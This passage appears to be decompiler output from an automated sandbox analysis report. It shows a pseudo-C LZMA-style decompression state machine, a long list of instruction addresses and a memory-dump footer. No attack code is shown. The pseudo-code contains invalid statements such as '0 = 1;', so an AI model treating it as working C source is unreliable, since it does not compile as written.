							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                  0x00000000
                                  0x00406bfe
                                  0x00406bfe
                                  0x00406c03
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x0040726a
                                  0x0040726a
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072bb
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00000000
                                  0x0040746e
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x00000000
                                  0x004072dd
                                  0x00406c05
                                  0x00406c05
                                  0x00406c09
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e93
                                  0x00406e96
                                  0x00406e39
                                  0x00406e3f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406e98
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00000000
                                  0x00406e36
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d42
                                  0x00406d45
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cc2
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dcf
                                  0x00406dd2
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d72
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406fa9
                                  0x00406fa9
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406d4b
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00000000
                                  0x00406cb9
                                  0x00406d45
                                  0x00406c4e
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x00000000
                                  0x00407267
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x00000000
                                  0x004073da
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00000000
                                  0x0040722f
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
